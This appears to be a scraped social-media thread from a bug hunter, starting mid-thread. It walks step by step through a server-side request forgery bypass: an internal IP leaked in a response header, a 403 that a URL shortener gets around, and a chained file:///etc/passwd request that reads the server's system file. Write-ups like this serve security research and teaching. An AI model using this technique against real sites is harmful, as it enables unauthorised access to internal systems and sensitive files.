2. target[.]com disclosing internal ip in the response header ex: X-Server: 10.136.166.91
3. Now target[.]com/download?url=http://10.136.166.91 (weird 403)
4. Used URL Shortener bitly and shortened http://10.136.166.91 (Example: bit[.]ly/blahblah)
5. Now target[.]com/download?url=bit[.]ly/blahblah I got successful response i.e with html content which is same as target[.]com
6. Now used http://10.136.166.91/download?url=file:///etc/passwd and shortened it ex: bit[.]ly/2ndblah (Because here frontend and backend both have same source code)
7. Here comes hackermode on target[.]com/download?url=http://bit[.]ly/2ndblah and successfully got etc/passwd content
Missing some tweets in this thread? Or failed to load images or videos? You can try to .